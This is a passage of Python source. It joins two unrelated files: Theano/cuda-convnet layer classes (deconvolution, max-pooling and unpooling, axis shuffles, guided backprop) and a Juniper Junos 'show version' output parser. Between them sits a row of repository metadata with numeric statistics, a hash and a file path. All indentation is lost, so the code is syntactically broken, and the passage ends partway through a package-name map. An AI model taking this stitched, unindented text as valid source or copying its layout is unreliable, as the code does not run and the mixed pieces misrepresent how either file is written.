self.nonlinearity = mirror_layer.nonlinearity
self.n_channels = mirror_layer.n_channels
self.n_filters = mirror_layer.n_filters
self.filter_size = mirror_layer.filter_size
self.weights_std = mirror_layer.weights_std
self.init_bias_value = mirror_layer.init_bias_value
self.stride = mirror_layer.stride
self.dropout = mirror_layer.dropout
self.partial_sum = mirror_layer.partial_sum
self.pad = mirror_layer.pad
self.untie_biases = mirror_layer.untie_biases
self.mb_size = self.input_layer.mb_size
self.filter_shape = mirror_layer.filter_shape
self.trainable = False
self.W = layers.shared_single(4)
if self.untie_biases:
self.b = layers.shared_single(3)
else:
self.b = layers.shared_single(1)
self.params = [self.W, self.b]
self.bias_params = [self.b]
self.data_order = layers.data_order.type2
assert (len(self.input_layer.get_output_shape()) == 4), \
'Input must have 4 dimensions.'
assert (self.input_layer.data_order == self.data_order), \
'Input data order does not match this layer\'s data order.'
self.reset_params()
self.image_acts_op = ImageActs(stride=self.stride,
partial_sum=self.partial_sum,
pad=self.pad)
def reset_params(self):
self.W.set_value(numpy.random.randn(*self.filter_shape).astype(
numpy.float32) * self.weights_std)
if self.untie_biases:
self.b.set_value(
numpy.ones(self.get_output_shape()[:3]).astype(numpy.float32)
* self.init_bias_value)
else:
self.b.set_value(numpy.ones(self.n_filters).astype(numpy.float32)
* self.init_bias_value)
def get_output_shape(self):
output_shape = self.mirror_layer.input_layer.get_output_shape()
return output_shape
def output(self, input=None, dropout_active=True, *args, **kwargs):
if input is None:
input = self.input_layer.output(dropout_active=dropout_active,
*args, **kwargs)
if self.untie_biases:
input -= self.b.dimshuffle(0, 1, 2, 'x')
else:
input -= self.b.dimshuffle(0, 'x', 'x', 'x')
if dropout_active and (self.dropout > 0.):
retain_prob = 1 - self.dropout
mask = layers.srng.binomial(input.shape, p=retain_prob,
dtype='int32').astype('float32')
# apply the input mask and rescale the input accordingly.
# By doing this it's no longer necessary to rescale the weights
# at test time.
input = input / retain_prob * mask
contiguous_input = gpu_contiguous(input)
contiguous_filters = gpu_contiguous(self.W)
if self.stride == 1:
deconved = self.image_acts_op(contiguous_input, contiguous_filters)
else:
_, x, y, _ = self.get_output_shape()
deconved = self.image_acts_op(contiguous_input, contiguous_filters,
as_tensor_variable((x, y)))
return self.nonlinearity(deconved)
class Deconv2DNoBiasLayer(object):
def __init__(self,
input_layer,
mirror_layer,
nonlinearity=None):
"""
Only the 'valid' border mode is supported.
n_filters should be a multiple of 16 (a cuda-convnet requirement).
"""
self.mirror_layer = mirror_layer
self.input_layer = input_layer
self.input_shape = self.input_layer.get_output_shape()
n_filters = self.input_shape[0]
if nonlinearity:
self.nonlinearity = nonlinearity
else:
self.nonlinearity = mirror_layer.nonlinearity
self.n_channels = mirror_layer.n_channels
self.n_filters = mirror_layer.n_filters
self.filter_size = mirror_layer.filter_size
self.weights_std = mirror_layer.weights_std
self.stride = mirror_layer.stride
self.dropout = mirror_layer.dropout
self.partial_sum = mirror_layer.partial_sum
self.pad = mirror_layer.pad
self.mb_size = self.input_layer.mb_size
self.filter_shape = mirror_layer.filter_shape
self.trainable = False
self.W = mirror_layer.W
self.params = []
self.data_order = layers.data_order.type2
assert (len(self.input_layer.get_output_shape()) == 4), \
'Input must have 4 dimensions.'
assert (self.input_layer.data_order == self.data_order), \
'Input data order does not match this layer\'s data order.'
self.image_acts_op = ImageActs(stride=self.stride,
partial_sum=self.partial_sum,
pad=self.pad)
def get_output_shape(self):
output_shape = self.mirror_layer.input_layer.get_output_shape()
return output_shape
def output(self, input=None, dropout_active=True, *args, **kwargs):
if input is None:
input = self.input_layer.output(dropout_active=dropout_active,
*args, **kwargs)
if dropout_active and (self.dropout > 0.):
retain_prob = 1 - self.dropout
mask = layers.srng.binomial(input.shape, p=retain_prob,
dtype='int32').astype('float32')
# apply the input mask and rescale the input accordingly.
# By doing this it's no longer necessary to rescale the weights
# at test time.
input = input / retain_prob * mask
contiguous_input = gpu_contiguous(input)
contiguous_filters = gpu_contiguous(self.W)
if self.stride == 1:
deconved = self.image_acts_op(contiguous_input, contiguous_filters)
else:
_, x, y, _ = self.get_output_shape()
deconved = self.image_acts_op(contiguous_input, contiguous_filters,
as_tensor_variable((x, y)))
return self.nonlinearity(deconved)
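# Note (editorial): the three deconv variants above differ only in how the
# parameters are handled:
#   Deconv2DLayer        - W and b tied to the mirror conv layer (params=[])
#   DeconvUntied2DLayer  - owns fresh W and b (params=[W, b]); shapes and
#                          hyperparameters are copied from the mirror layer
#   Deconv2DNoBiasLayer  - W tied to the mirror layer, no bias term at all
# All three invert the convolution with cuda-convnet's ImageActs, which
# computes the gradient of FilterActs with respect to its input image.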
class Pooling2DLayer(object):
def __init__(self, input_layer, pool_size, stride=None):
"""
pool_size is an INTEGER, not a tuple: only square pooling is supported.
If stride is None, it defaults to the pool size.
Borders are never ignored.
"""
self.pool_size = pool_size
self.stride = stride if stride is not None else pool_size
self.input_layer = input_layer
self.trainable = False
self.params = []
self.bias_params = []
self.mb_size = self.input_layer.mb_size
self.data_order = layers.data_order.type2
assert (len(self.input_layer.get_output_shape()) == 4), \
'Input must have 4 dimensions.'
assert (self.input_layer.data_order == self.data_order), \
'Input data order does not match this layer\'s data order.'
self.pool_op = MaxPool(ds=self.pool_size, stride=self.stride)
def get_output_shape(self):
input_shape = self.input_layer.get_output_shape()
w, h = input_shape[1], input_shape[2]
new_w = int(numpy.ceil(float(w - self.pool_size + self.stride)
/ self.stride))
new_h = int(numpy.ceil(float(h - self.pool_size + self.stride)
/ self.stride))
return (input_shape[0], new_w, new_h, input_shape[3])
def output(self, *args, **kwargs):
input = self.input_layer.output(*args, **kwargs)
contiguous_input = gpu_contiguous(input)
return self.pool_op(contiguous_input)
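# Editorial worked example of the ceil-based rule in get_output_shape():
#   w = 7, pool_size = 3, stride = 2  ->  new_w = ceil((7-3+2)/2) = 3
#     windows start at columns 0, 2, 4; the last one (4..6) fits exactly.
#   w = 8 under the same settings     ->  new_w = ceil((8-3+2)/2) = 4
#     the fourth window (6..8) is partial but still counted, which is what
#     "borders are never ignored" means above.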
class Unpooling2DLayer(object):
def __init__(self, input_layer, pooling_layer):
"""
The pool size and stride are taken from the mirrored pooling layer.
Only square pooling is supported; borders are never ignored.
"""
self.pool_size = pooling_layer.pool_size
self.stride = pooling_layer.stride
self.input_layer = input_layer
self.pooling_layer = pooling_layer
self.trainable = False
self.params = []
self.bias_params = []
self.mb_size = self.input_layer.mb_size
self.data_order = layers.data_order.type2
assert (len(self.input_layer.get_output_shape()) == 4), \
'Input must have 4 dimensions.'
assert (self.input_layer.data_order == self.data_order), \
'Input data order does not match this layer\'s data order.'
self.unpool_op = MaxPoolGrad(ds=self.pool_size, stride=self.stride,
start=0)
def get_output_shape(self):
shape = self.pooling_layer.input_layer.get_output_shape()
return shape
def output(self, *args, **kwargs):
input = self.input_layer.output(*args, **kwargs)
max_out = self.pooling_layer.output(*args, **kwargs)
orig_input = self.pooling_layer.input_layer.output(*args, **kwargs)
return self.unpool_op(orig_input, max_out, input)
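# Note (editorial): MaxPoolGrad is cuda-convnet's gradient op for MaxPool.
# Called as unpool_op(orig_input, max_out, input), it routes each value of
# `input` back to the position that produced the corresponding maximum in
# the forward pass and writes zeros everywhere else -- i.e. "switched"
# max-unpooling, restoring the pre-pooling spatial shape.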
class ShuffleC01BToBC01Layer(object):
"""
This layer dimshuffles 4D input for interoperability for C01B and BC01 ops.
C01B (cuda convnet) -> BC01 (theano)
"""
def __init__(self, input_layer):
self.input_layer = input_layer
self.trainable = False
self.params = []
self.bias_params = []
self.mb_size = self.input_layer.mb_size
self.data_order = layers.data_order.type1
assert (len(self.input_layer.get_output_shape()) == 4), \
'Input must have 4 dimensions.'
assert (self.input_layer.data_order == layers.data_order.type2), \
'Input data order does not match this layer\'s data order.'
def get_output_shape(self):
input_shape = self.input_layer.get_output_shape()
return (input_shape[3], input_shape[0], input_shape[1], input_shape[2])
def output(self, *args, **kwargs):
input = self.input_layer.output(*args, **kwargs)
return input.dimshuffle(3, 0, 1, 2)
class ShuffleBC01ToC01BLayer(object):
"""
This layer dimshuffles 4D input for interoperability for C01B and BC01 ops.
BC01 (theano) -> C01B (cuda convnet)
"""
def __init__(self, input_layer):
self.input_layer = input_layer
self.trainable = False
self.params = []
self.bias_params = []
self.mb_size = self.input_layer.mb_size
self.data_order = layers.data_order.type2
assert (len(self.input_layer.get_output_shape()) == 4), \
'Input must have 4 dimensions.'
assert (self.input_layer.data_order == layers.data_order.type1), \
'Input data order does not match this layer\'s data order.'
def get_output_shape(self):
input_shape = self.input_layer.get_output_shape()
return (input_shape[1], input_shape[2], input_shape[3], input_shape[0])
def output(self, *args, **kwargs):
input = self.input_layer.output(*args, **kwargs)
return input.dimshuffle(1, 2, 3, 0)
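# Editorial shape check, using numpy.transpose as a stand-in for theano's
# dimshuffle (axis orders as in the two shuffle layers above):
#   import numpy as np
#   x = np.zeros((16, 32, 32, 128))   # c01b: (channels, h, w, batch)
#   b = x.transpose(3, 0, 1, 2)       # c01b -> bc01: (128, 16, 32, 32)
#   b.transpose(1, 2, 3, 0).shape     # bc01 -> c01b: (16, 32, 32, 128)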
class Deconv2DNoBiasLayerGuidedBackProp(Deconv2DNoBiasLayer):
def output(self, input=None, dropout_active=True, *args, **kwargs):
if input is None:
input = self.input_layer.output(dropout_active=dropout_active,
*args, **kwargs)
if dropout_active and (self.dropout > 0.):
retain_prob = 1 - self.dropout
mask = layers.srng.binomial(input.shape, p=retain_prob,
dtype='int32').astype('float32')
# apply the input mask and rescale the input accordingly.
# By doing this it's no longer necessary to rescale the weights
# at test time.
input = input / retain_prob * mask
contiguous_input = gpu_contiguous(input)
contiguous_filters = gpu_contiguous(self.W)
if self.stride == 1:
deconved = self.image_acts_op(contiguous_input, contiguous_filters)
else:
_, x, y, _ = self.get_output_shape()
deconved = self.image_acts_op(contiguous_input, contiguous_filters,
as_tensor_variable((x, y)))
mask = (deconved > 0.0) * (self.mirror_layer.input_layer.output() > 0.0)
return mask * deconved
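# Editorial sketch of the guided-backprop mask above, in plain numpy: the
# backward signal is kept only where BOTH the reconstruction and the original
# forward activation are positive (Springenberg et al., 2015).
#   import numpy as np
#   deconved = np.array([-1.0, 2.0, 3.0])
#   forward  = np.array([ 0.5, -1.0, 2.0])
#   mask = (deconved > 0.0) * (forward > 0.0)   # -> [False, False, True]
#   guided = mask * deconved                    # -> [0., 0., 3.]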
| 36.724658
| 80
| 0.604163
| 3,275
| 26,809
| 4.716641
| 0.065649
| 0.058846
| 0.066162
| 0.02829
| 0.895449
| 0.864245
| 0.847737
| 0.832459
| 0.824432
| 0.820548
| 0
| 0.012487
| 0.306986
| 26,809
| 729
| 81
| 36.775034
| 0.818935
| 0.083964
| 0
| 0.84585
| 0
| 0
| 0.033851
| 0
| 0
| 0
| 0
| 0.001372
| 0.039526
| 1
| 0.073123
| false
| 0
| 0.025692
| 0.005929
| 0.167984
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d3ca02476d65c821777d2e06310223c1136ca350
| 27,771
|
py
|
Python
|
src/genie/libs/parser/junos/show_version.py
|
balmasea/genieparser
|
d1e71a96dfb081e0a8591707b9d4872decd5d9d3
|
[
"Apache-2.0"
] | 204
|
2018-06-27T00:55:27.000Z
|
2022-03-06T21:12:18.000Z
|
src/genie/libs/parser/junos/show_version.py
|
balmasea/genieparser
|
d1e71a96dfb081e0a8591707b9d4872decd5d9d3
|
[
"Apache-2.0"
] | 468
|
2018-06-19T00:33:18.000Z
|
2022-03-31T23:23:35.000Z
|
src/genie/libs/parser/junos/show_version.py
|
balmasea/genieparser
|
d1e71a96dfb081e0a8591707b9d4872decd5d9d3
|
[
"Apache-2.0"
] | 309
|
2019-01-16T20:21:07.000Z
|
2022-03-30T12:56:41.000Z
|
""" show_krt.py
JunOs parsers for the following show commands:
* show version detail
* show version detail no-forwarding
* show version invoke-on all-routing-engines
"""
import re
from genie.metaparser import MetaParser
from pyats.utils.exceptions import SchemaError
from genie.metaparser.util.schemaengine import (Any,
Optional, Use, Schema, ListOf)
class ShowVersionDetailSchema(MetaParser):
""" schema = {
Optional("@xmlns:junos"): str,
"software-information": {
Optional("cli"): {
"display-version": str
},
"host-name": str,
"junos-version": str,
"output": "list",
"package-information": [
{
"comment": str,
"name": str
}
],
"product-model": str,
"product-name": str,
"version-information": [
{
"build-date": str,
"build-number": str,
"builder": str,
"component": str,
"major": str,
"minor": str,
"release": str,
"release-category": str,
"spin": str
}
]
}
} """
# Main Schema
schema = {
Optional("@xmlns:junos"): str,
"software-information": {
Optional("cli"): {
Optional("display-version"): str
},
"host-name": str,
"junos-version": str,
"output": list,
"package-information": ListOf({
"comment": str,
"name": str
}),
"product-model": str,
Optional("product-name"): str,
"version-information": ListOf({
"build-date": str,
Optional("build-number"): str,
"builder": str,
"component": str,
Optional("major"): str,
Optional("minor"): str,
"release": str,
Optional("release-category"): str,
Optional("spin"): str
})
}
}
class ShowVersionDetail(ShowVersionDetailSchema):
""" Parser for:
* show version detail
"""
cli_command = 'show version detail'
def cli(self, output=None):
if not output:
out = self.device.execute(self.cli_command)
else:
out = output
ret_dict = {}
#Hostname: sr_hktGDS201
p1 = re.compile(r'^Hostname: +(?P<host_name>\S+)$')
#Model: vmx
p2 = re.compile(r'^Model: +(?P<product_model>\S+)$')
#Junos: 19.2R1.8
p3 = re.compile(r'^Junos: +(?P<junos_version>\S+)$')
#JLAUNCHD release 19.2R1.8 built by builder on 2019-06-21 17:47:00 UTC
p4 = re.compile(r'^(?P<output>\AJLAUNCHD+[\S\s]+)$')
#smartd 6.4 2015-06-04 r4109 [FreeBSD JNPR-11.0-20190517.f0321c3_buil amd64] Junos Build
p5 = re.compile(r'^(?P<output>\Asmartd+[\S\s]+)$')
#Copyright (C) 2002-15, Bruce Allen, Christian Franke, www.smartmontools.org
p6 = re.compile(r'^(?P<output>\ACopyright+[\S\s]+)$')
#JUNOS OS Kernel 64-bit [20190517.f0321c3_builder_stable_11]
p7 = re.compile(r'^(?P<comment>JUNOS[\S\s]+)$')
#KERNEL JNPR-11.0-20190517.f0321c3_builder_stable_11 #0 r356482+f0321c3e9c9(HEAD) built
p8 = re.compile(r'^(?P<comment>KERNEL[\S\s]+)$')
#MGD release 20190606.224121_builder.r1033375 built by builder on 2019-06-06 22:58:49 UTC
#COMMIT-SYNCD release 20190606.224121_builder.r1033375 built by builder on 2019-06-06 22:58:46 UTC
p9 = re.compile(r'^(?P<component>[\w\s\-]+)release +(?P<release>\S+) +built +by +(?P<builder>\S+) +on +(?P<build_date>[\S\s]+)$')
package_map = {"JUNOS OS Kernel 64-bit [20190517.f0321c3_builder_stable_11]":"os-kernel",
"JUNOS OS libs [20190517.f0321c3_builder_stable_11]":"os-libs",
"JUNOS OS runtime [20190517.f0321c3_builder_stable_11]":"os-runtime",
"JUNOS OS time zone information [20190517.f0321c3_builder_stable_11]":"zoneinfo",
"JUNOS network stack and utilities [20190621.152752_builder_junos_192_r1]":"netstack",
"JUNOS libs [20190621.152752_builder_junos_192_r1]":"junos-libs",
"JUNOS OS libs compat32 [20190517.f0321c3_builder_stable_11]":"os-libs-compat32",
"JUNOS OS 32-bit compatibility [20190517.f0321c3_builder_stable_11]":"os-compat32",
"JUNOS libs compat32 [20190621.152752_builder_junos_192_r1]":"junos-libs-compat32",
"JUNOS runtime [20190621.152752_builder_junos_192_r1]":"junos-runtime",
"JUNOS Packet Forwarding Engine Simulation Package [20190621.152752_builder_junos_192_r1]":"vmguest",
"JUNOS sflow mx [20190621.152752_builder_junos_192_r1]":"sflow-platform",
"JUNOS py extensions [20190621.152752_builder_junos_192_r1]":"py-extensions",
"JUNOS py base [20190621.152752_builder_junos_192_r1]":"py-base",
"JUNOS OS vmguest [20190517.f0321c3_builder_stable_11]":"os-vmguest",
"JUNOS OS crypto [20190517.f0321c3_builder_stable_11]":"os-crypto",
"JUNOS na telemetry [19.2R1.8]":"na-telemetry",
"JUNOS mx libs compat32 [20190621.152752_builder_junos_192_r1]":"junos-libs-compat32-platform",
"JUNOS mx runtime [20190621.152752_builder_junos_192_r1]":"junos-runtime-platform",
"JUNOS common platform support [20190621.152752_builder_junos_192_r1]":"junos-platform",
"JUNOS Openconfig [19.2R1.8]":"junos-openconfig",
"JUNOS mtx network modules [20190621.152752_builder_junos_192_r1]":"junos-net-platform",
"JUNOS modules [20190621.152752_builder_junos_192_r1]":"junos-modules",
"JUNOS mx modules [20190621.152752_builder_junos_192_r1]":"junos-modules-platform",
"JUNOS mx libs [20190621.152752_builder_junos_192_r1]":"junos-libs-platform",
"JUNOS SQL Sync Daemon [20190621.152752_builder_junos_192_r1]":"junos-jsqlsync",
"JUNOS mtx Data Plane Crypto Support [20190621.152752_builder_junos_192_r1]":"junos-dp-crypto-support-platform",
"JUNOS daemons [20190621.152752_builder_junos_192_r1]":"junos-daemons",
"JUNOS mx daemons [20190621.152752_builder_junos_192_r1]":"junos-daemons-platform",
"JUNOS -MX appidd application-identification daemon [20190621.152752_builder_junos_192_r1]":"junos-appidd",
"JUNOS Simulation Linux Package [20190621.152752_builder_junos_192_r1]":"jsim-wrlinux",
"JUNOS Simulation Package [20190621.152752_builder_junos_192_r1]":"jsim-pfe-vmx",
"JUNOS Services URL Filter package [20190621.152752_builder_junos_192_r1]":"jservices-urlf",
"JUNOS Services TLB Service PIC package [20190621.152752_builder_junos_192_r1]":"jservices-traffic-dird",
"JUNOS Services Telemetry [20190621.152752_builder_junos_192_r1]":"jservices-telemetry",
"JUNOS Services TCP-LOG [20190621.152752_builder_junos_192_r1]":"jservices-tcp-log",
"JUNOS Services SSL [20190621.152752_builder_junos_192_r1]":"jservices-ssl",
"JUNOS Services SOFTWIRE [20190621.152752_builder_junos_192_r1]":"jservices-softwire",
"JUNOS Services Stateful Firewall [20190621.152752_builder_junos_192_r1]":"jservices-sfw",
"JUNOS Services RTCOM [20190621.152752_builder_junos_192_r1]":"jservices-rtcom",
"JUNOS Services RPM [20190621.152752_builder_junos_192_r1]":"jservices-rpm",
"JUNOS Services PCEF package [20190621.152752_builder_junos_192_r1]":"jservices-pcef",
"JUNOS Services NAT [20190621.152752_builder_junos_192_r1]":"jservices-nat",
"JUNOS Services Mobile Subscriber Service Container package [20190621.152752_builder_junos_192_r1]":"jservices-mss",
"JUNOS Services MobileNext Software package [20190621.152752_builder_junos_192_r1]":"jservices-mobile",
"JUNOS Services Logging Report Framework package [20190621.152752_builder_junos_192_r1]":"jservices-lrf",
"JUNOS Services LL-PDF Container package [20190621.152752_builder_junos_192_r1]":"jservices-llpdf",
"JUNOS Services Jflow Container package [20190621.152752_builder_junos_192_r1]":"jservices-jflow",
"JUNOS Services Deep Packet Inspection package [20190621.152752_builder_junos_192_r1]":"jservices-jdpi",
"JUNOS Services IPSec [20190621.152752_builder_junos_192_r1]":"jservices-ipsec",
"JUNOS Services IDS [20190621.152752_builder_junos_192_r1]":"jservices-ids",
"JUNOS IDP Services [20190621.152752_builder_junos_192_r1]":"jservices-idp",
"JUNOS Services HTTP Content Management package [20190621.152752_builder_junos_192_r1]":"jservices-hcm",
"JUNOS Services Flowd MS-MPC Software package [20190621.152752_builder_junos_192_r1]":"jservices-fwdd",
"JUNOS Services Crypto [20190621.152752_builder_junos_192_r1]":"jservices-crypto-base",
"JUNOS Services Captive Portal and Content Delivery Container package [20190621.152752_builder_junos_192_r1]":"jservices-cpcd",
"JUNOS Services COS [20190621.152752_builder_junos_192_r1]":"jservices-cos",
"JUNOS AppId Services [20190621.152752_builder_junos_192_r1]":"jservices-appid",
"JUNOS Services Application Level Gateways [20190621.152752_builder_junos_192_r1]":"jservices-alg",
"JUNOS Services AACL Container package [20190621.152752_builder_junos_192_r1]":"jservices-aacl",
"JUNOS Extension Toolkit [20190621.152752_builder_junos_192_r1]":"jsd-jet-1",
"JUNOS Juniper Malware Removal Tool (JMRT) [1.0.0+20190621.152752_builder_junos_192_r1]":"jmrt-base-x86-64",
"JUNOS J-Insight [20190621.152752_builder_junos_192_r1]":"jinsight",
"JUNOS Online Documentation [20190621.152752_builder_junos_192_r1]":"jdocs",
"JUNOS jail runtime [20190517.f0321c3_builder_stable_11]":"jail-runtime",
"KERNEL JNPR-11.0-20190517.f0321c3_builder_stable_11 #0 r356482+f0321c3e9c9(HEAD) built":"KERNEL"
}
for line in out.splitlines():
line = line.strip()
# Hostname: sr_hktGDS201
m = p1.match(line)
if m:
software_info_first_entry = ret_dict.setdefault("software-information", {})
group = m.groupdict()
package_list = []
version_info_list = []
software_info_first_entry['host-name'] = group['host_name']
continue
# Model: vmx
m = p2.match(line)
if m:
group = m.groupdict()
software_info_first_entry['product-model'] = group['product_model']
software_info_first_entry['product-name'] = group['product_model']
continue
# Junos: 19.2R1.8
m = p3.match(line)
if m:
group = m.groupdict()
software_info_first_entry['junos-version'] = group['junos_version']
continue
# JLAUNCHD release 19.2R1.8 built by builder on 2019-06-21 17:47:00 UTC
m = p4.match(line)
if m:
group = m.groupdict()
output_list = []
output_list.append(group['output'])
continue
# smartd 6.4 2015-06-04 r4109 [FreeBSD JNPR-11.0-20190517.f0321c3_buil amd64] Junos Build
m = p5.match(line)
if m:
group = m.groupdict()
output_list.append(group['output'])
continue
# Copyright (C) 2002-15, Bruce Allen, Christian Franke, www.smartmontools.org
m = p6.match(line)
if m:
group = m.groupdict()
output_list.append(group['output'])
software_info_first_entry["output"] = output_list
continue
#JUNOS OS Kernel 64-bit [20190517.f0321c3_builder_stable_11]
m = p7.match(line)
if m:
group = m.groupdict()
entry_dict = {}
entry_dict["comment"] = group["comment"]
entry_dict["name"] = package_map[group["comment"]]
package_list.append(entry_dict)
continue
#KERNEL JNPR-11.0-20190517.f0321c3_builder_stable_11 #0 r356482+f0321c3e9c9(HEAD) built
m = p8.match(line)
if m:
group = m.groupdict()
entry_dict = {}
entry_dict["comment"] = group["comment"]
entry_dict["name"] = package_map[group["comment"]]
package_list.append(entry_dict)
software_info_first_entry["package-information"] = package_list
continue
#MGD release 20190606.224121_builder.r1033375 built by builder on 2019-06-06 22:58:49 UTC
#COMMIT-SYNCD release 20190606.224121_builder.r1033375 built by builder on 2019-06-06 22:58:46 UTC
m = p9.match(line)
if m:
group = m.groupdict()
entry_dict = {}
entry_dict["build-date"] = group["build_date"]
entry_dict["builder"] = group["builder"]
entry_dict["component"] = group["component"]
entry_dict["release"] = group["release"]
version_info_list.append(entry_dict)
if(group["component"].strip() == "vlans-ng-actions-dd"):
software_info_first_entry["version-information"] = version_info_list
continue
return ret_dict
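# Usage sketch (editorial; `dev` is a hypothetical connected pyATS device):
#   parsed = ShowVersionDetail(device=dev).parse()
# or, replaying captured CLI output offline:
#   parsed = ShowVersionDetail(device=dev).cli(output=raw_text)
# parse() additionally validates the result against ShowVersionDetailSchema;
# cli() returns the raw dictionary.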
class ShowVersionDetailNoForwarding(ShowVersionDetail):
""" Parser for:
* show version detail no-forwarding
"""
cli_command = 'show version detail no-forwarding'
def cli(self, output=None):
if not output:
out = self.device.execute(self.cli_command)
else:
out = output
return super().cli(output=out)
class ShowVersionInvokeOnAllRoutingEnginesSchema(MetaParser):
""" schema = {
Optional("@xmlns:junos"): str,
"multi-routing-engine-results": {
"multi-routing-engine-item": {
"re-name": str,
"software-information": {
"host-name": str,
"junos-version": str,
"package-information": [
{
"comment": str,
"name": str
}
],
"product-model": str,
"product-name": str
}
}
}
} """
# Main Schema
schema = {
Optional("@xmlns:junos"): str,
"multi-routing-engine-results": {
"multi-routing-engine-item": {
"re-name": str,
"software-information": {
"host-name": str,
"junos-version": str,
"package-information": ListOf({
"comment": str,
"name": str
}),
"product-model": str,
Optional("product-name"): str
}
}
}
}
class ShowVersionInvokeOnAllRoutingEngines(ShowVersionInvokeOnAllRoutingEnginesSchema):
""" Parser for:
* show version invoke-on all-routing-engines
"""
cli_command = 'show version invoke-on all-routing-engines'
def cli(self, output=None):
if not output:
out = self.device.execute(self.cli_command)
else:
out = output
ret_dict = {}
#re0:
p0 = re.compile(r'^(?P<re_name>re\d+):$')
#Hostname: sr_hktGDS201
p1 = re.compile(r'^Hostname: +(?P<host_name>\S+)$')
#Model: vmx
p2 = re.compile(r'^Model: +(?P<product_model>\S+)$')
#Junos: 19.2R1.8
p3 = re.compile(r'^Junos: +(?P<junos_version>\S+)$')
#JLAUNCHD release 19.2R1.8 built by builder on 2019-06-21 17:47:00 UTC
p4 = re.compile(r'^(?P<output>\AJLAUNCHD+[\S\s]+)$')
#smartd 6.4 2015-06-04 r4109 [FreeBSD JNPR-11.0-20190517.f0321c3_buil amd64] Junos Build
p5 = re.compile(r'^(?P<output>\Asmartd+[\S\s]+)$')
#Copyright (C) 2002-15, Bruce Allen, Christian Franke, www.smartmontools.org
p6 = re.compile(r'^(?P<output>\ACopyright+[\S\s]+)$')
#JUNOS OS Kernel 64-bit [20190517.f0321c3_builder_stable_11]
p7 = re.compile(r'^(?P<comment>JUNOS[\S\s]+)$')
#KERNEL JNPR-11.0-20190517.f0321c3_builder_stable_11 #0 r356482+f0321c3e9c9(HEAD) built
p8 = re.compile(r'^(?P<comment>KERNEL[\S\s]+)$')
#MGD release 20190606.224121_builder.r1033375 built by builder on 2019-06-06 22:58:49 UTC
#COMMIT-SYNCD release 20190606.224121_builder.r1033375 built by builder on 2019-06-06 22:58:46 UTC
p9 = re.compile(r'^(?P<component>[\w\s\-]+)release +(?P<release>\S+) +built +by +(?P<builder>\S+) +on +(?P<build_date>[\S\s]+)$')
package_map = {"JUNOS OS Kernel 64-bit [20190517.f0321c3_builder_stable_11]":"os-kernel",
"JUNOS OS libs [20190517.f0321c3_builder_stable_11]":"os-libs",
"JUNOS OS runtime [20190517.f0321c3_builder_stable_11]":"os-runtime",
"JUNOS OS time zone information [20190517.f0321c3_builder_stable_11]":"zoneinfo",
"JUNOS network stack and utilities [20190621.152752_builder_junos_192_r1]":"netstack",
"JUNOS libs [20190621.152752_builder_junos_192_r1]":"junos-libs",
"JUNOS OS libs compat32 [20190517.f0321c3_builder_stable_11]":"os-libs-compat32",
"JUNOS OS 32-bit compatibility [20190517.f0321c3_builder_stable_11]":"os-compat32",
"JUNOS libs compat32 [20190621.152752_builder_junos_192_r1]":"junos-libs-compat32",
"JUNOS runtime [20190621.152752_builder_junos_192_r1]":"junos-runtime",
"JUNOS Packet Forwarding Engine Simulation Package [20190621.152752_builder_junos_192_r1]":"vmguest",
"JUNOS sflow mx [20190621.152752_builder_junos_192_r1]":"sflow-platform",
"JUNOS py extensions [20190621.152752_builder_junos_192_r1]":"py-extensions",
"JUNOS py base [20190621.152752_builder_junos_192_r1]":"py-base",
"JUNOS OS vmguest [20190517.f0321c3_builder_stable_11]":"os-vmguest",
"JUNOS OS crypto [20190517.f0321c3_builder_stable_11]":"os-crypto",
"JUNOS na telemetry [19.2R1.8]":"na-telemetry",
"JUNOS mx libs compat32 [20190621.152752_builder_junos_192_r1]":"junos-libs-compat32-platform",
"JUNOS mx runtime [20190621.152752_builder_junos_192_r1]":"junos-runtime-platform",
"JUNOS common platform support [20190621.152752_builder_junos_192_r1]":"junos-platform",
"JUNOS Openconfig [19.2R1.8]":"junos-openconfig",
"JUNOS mtx network modules [20190621.152752_builder_junos_192_r1]":"junos-net-platform",
"JUNOS modules [20190621.152752_builder_junos_192_r1]":"junos-modules",
"JUNOS mx modules [20190621.152752_builder_junos_192_r1]":"junos-modules-platform",
"JUNOS mx libs [20190621.152752_builder_junos_192_r1]":"junos-libs-platform",
"JUNOS SQL Sync Daemon [20190621.152752_builder_junos_192_r1]":"junos-jsqlsync",
"JUNOS mtx Data Plane Crypto Support [20190621.152752_builder_junos_192_r1]":"junos-dp-crypto-support-platform",
"JUNOS daemons [20190621.152752_builder_junos_192_r1]":"junos-daemons",
"JUNOS mx daemons [20190621.152752_builder_junos_192_r1]":"junos-daemons-platform",
"JUNOS -MX appidd application-identification daemon [20190621.152752_builder_junos_192_r1]":"junos-appidd",
"JUNOS Simulation Linux Package [20190621.152752_builder_junos_192_r1]":"jsim-wrlinux",
"JUNOS Simulation Package [20190621.152752_builder_junos_192_r1]":"jsim-pfe-vmx",
"JUNOS Services URL Filter package [20190621.152752_builder_junos_192_r1]":"jservices-urlf",
"JUNOS Services TLB Service PIC package [20190621.152752_builder_junos_192_r1]":"jservices-traffic-dird",
"JUNOS Services Telemetry [20190621.152752_builder_junos_192_r1]":"jservices-telemetry",
"JUNOS Services TCP-LOG [20190621.152752_builder_junos_192_r1]":"jservices-tcp-log",
"JUNOS Services SSL [20190621.152752_builder_junos_192_r1]":"jservices-ssl",
"JUNOS Services SOFTWIRE [20190621.152752_builder_junos_192_r1]":"jservices-softwire",
"JUNOS Services Stateful Firewall [20190621.152752_builder_junos_192_r1]":"jservices-sfw",
"JUNOS Services RTCOM [20190621.152752_builder_junos_192_r1]":"jservices-rtcom",
"JUNOS Services RPM [20190621.152752_builder_junos_192_r1]":"jservices-rpm",
"JUNOS Services PCEF package [20190621.152752_builder_junos_192_r1]":"jservices-pcef",
"JUNOS Services NAT [20190621.152752_builder_junos_192_r1]":"jservices-nat",
"JUNOS Services Mobile Subscriber Service Container package [20190621.152752_builder_junos_192_r1]":"jservices-mss",
"JUNOS Services MobileNext Software package [20190621.152752_builder_junos_192_r1]":"jservices-mobile",
"JUNOS Services Logging Report Framework package [20190621.152752_builder_junos_192_r1]":"jservices-lrf",
"JUNOS Services LL-PDF Container package [20190621.152752_builder_junos_192_r1]":"jservices-llpdf",
